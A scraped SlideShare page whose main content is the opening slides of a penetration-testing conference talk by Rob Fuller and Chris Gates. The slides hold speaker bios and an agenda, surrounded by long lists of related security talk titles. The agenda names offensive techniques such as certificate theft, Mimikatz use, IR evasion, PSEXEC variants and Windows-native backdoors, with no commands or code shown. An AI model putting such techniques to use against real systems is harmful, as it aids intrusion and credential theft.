Will Schroeder
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
Will Schroeder
 
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOSReady player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
Cody Thomas
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
Julian Catrambone
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
RootedCON
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

What's hot (20)

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOSReady player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
Priyanka Aash
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
Karl Fosaaen
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB Deployment
MongoDB
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
Brian Pontarelli
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
Felipe Prado
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
jonmccoy
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure code
Flaskdata.io
 
authentication.ppt
authentication.pptauthentication.ppt
authentication.ppt
AchinikeWinifred
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Nick Maludy
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
in.security Ltd.
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
MongoDB
 

Similar to Dirty Little Secrets They Didn't Teach You In Pentest Class v2 (20)

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
 
Securing Your MongoDB Deployment
Securing Your MongoDB DeploymentSecuring Your MongoDB Deployment
Securing Your MongoDB Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
 
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by DesignJon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
Jon McCoy - AppSec-USA-2014 Hacking C#(.NET) Applications:Defend by Design
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to write secure code
How to write secure codeHow to write secure code
How to write secure code
 
authentication.ppt
authentication.pptauthentication.ppt
authentication.ppt
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL CertificatesHashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
Hashitalks 2021 - How the Dynamic Duo of Vault and Puppet Tame SSL Certificates
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 

More from Rob Fuller

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
Rob Fuller
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
Rob Fuller
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish TurnsRob Fuller
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Metasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkMetasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkRob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
Rob Fuller
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
Rob Fuller
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
Rob Fuller
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
Rob Fuller
 

More from Rob Fuller (17)

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
GiTFO
GiTFOGiTFO
GiTFO
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish Turns
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual Pwnership
 
Metasploit magic the dark coners of the framework
Metasploit magic the dark coners of the frameworkMetasploit magic the dark coners of the framework
Metasploit magic the dark coners of the framework
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
 

Recently uploaded

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 

Dirty Little Secrets They Didn't Teach You In Pentest Class v2

  • 1.
  • 2. Whoami • Rob Fuller (mubix) – Twitter -> mubix – Blog -> http://www.room362.com – NoVA Hackers • Previous Talks – Dirty Little Secrets – Networking for Penetration Testers – Metasploit Framework/Pro Training for Rapid7 – Deep Magic 101 – Couch to Career in 80 hours
  • 3. Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – NoVAHackers • Previous Talks – ColdFusion for Pentesters – From LOW to PWNED – Dirty Little Secrets – Attacking Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
  • 4. Infoz • No philosophical stuff this time – Just digging in and showing neat shit we’ve been doing since last year – Last year’s stuff still applies although was told we were “preaching to the choir”…who still doesn’t do it…maybe on Sundays… – Anway…
  • 5. Agenda • Putting in the hours on LinkedIn for SE • Giving IR teams a run for their money • Stealing certs • Mimikatz with Metasploit • New Incognito && Netview release • Ditto • 10 ways to PSEXEC • Why doesn’t SYSTEM have proxy settings!?! • Windows is my backdoor (bitsadmin, powershell, wmi ) • WebDAV server via metasploit • Turning your External Pentest into an Internal one • Overview of current DNS Payload options (if time)
  • 6. The setup… We like to use LinkedIn for OSINT but how can we do it better?
